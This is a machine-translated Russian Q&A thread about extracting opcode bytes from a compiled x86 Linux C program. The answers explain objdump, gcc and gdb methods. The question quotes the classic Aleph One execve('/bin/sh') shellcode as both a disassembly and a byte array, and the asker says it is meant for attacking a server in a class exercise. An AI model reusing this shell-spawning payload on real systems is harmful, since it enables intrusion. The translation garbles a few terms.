Как получить коды операций программы переменного тока

Question

Я знаю, как получить код сборки моей программы, используя gdb, но как мне получить код операции? Мне нужно, чтобы он взломал Linux-сервер (не волнуйтесь, это часть моего класса, так что никакой реальный сервер не пострадает). На самом деле я читал эту статью, и мне интересно, как я могу получить от сборки:

[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm

(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.

следующее:

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

Система - linux x86, и я буду использовать язык C. Мне бы очень хотелось, чтобы это был автоматический способ, но ручное решение тоже подойдет.

Я имею в виду, как мне конвертировать% ebp,% esi,% esp и т. Д. Есть ли карта, которую я могу использовать? или автоматизированная программа?

Answer 1

Вот, пожалуйста:

Disassembly of section .data:

00000000 <shellcode>:
   0:       eb 2a                   jmp    2c <shellcode+0x2c>
   2:       5e                      pop    %esi
   3:       89 76 08                mov    %esi,0x8(%esi)
   6:       c6 46 07 00             movb   $0x0,0x7(%esi)
   a:       c7 46 0c 00 00 00 00    movl   $0x0,0xc(%esi)
  11:       b8 0b 00 00 00          mov    $0xb,%eax
  16:       89 f3                   mov    %esi,%ebx
  18:       8d 4e 08                lea    0x8(%esi),%ecx
  1b:       8d 56 0c                lea    0xc(%esi),%edx
  1e:       cd 80                   int    $0x80
  20:       b8 01 00 00 00          mov    $0x1,%eax
  25:       bb 00 00 00 00          mov    $0x0,%ebx
  2a:       cd 80                   int    $0x80
  2c:       e8 d1 ff ff ff          call   2 <shellcode+0x2>
  31:       2f                      das
  32:       62 69 6e                bound  %ebp,0x6e(%ecx)
  35:       2f                      das
  36:       73 68                   jae    a0 <shellcode+0xa0>
  38:       00 89 ec 5d c3 00       add    %cl,0xc35dec(%ecx)

Обратите внимание, что последние 00 в этой инструкции add %cl берутся из строки нулевого терминатора строки; это не явно.

Как я понял, я просто скомпилировал вашу декларацию с

gcc testsc.c -c

, а затем

objdump -D testsc.o

Answer 2

Вы можете использовать:

gcc -S -c tst.c -o -

или

gcc -g -ggdb -c tst.c
objdump -S tst.o

, чтобы получить разборку вашей программы с кодами операций.

Чтобы получить разборку вашего символамассив, вы можете использовать:

gcc -c tst.c
objdump -D -j .data tst.o

Answer 3

Нашли это! Сначала разберите, а затем введите: x / bx нажмите ввод и получите одно за другим шестнадцатеричное представление команд сборки!

Answer 4

Создайте небольшой файл сборки, скажем code.s. Затем поместите следующее:

.text
.byte 0xeb, 0x2a, 0x5e, ..

Соберите его с помощью as code.s -o code.o и используйте objdump для разбора результата.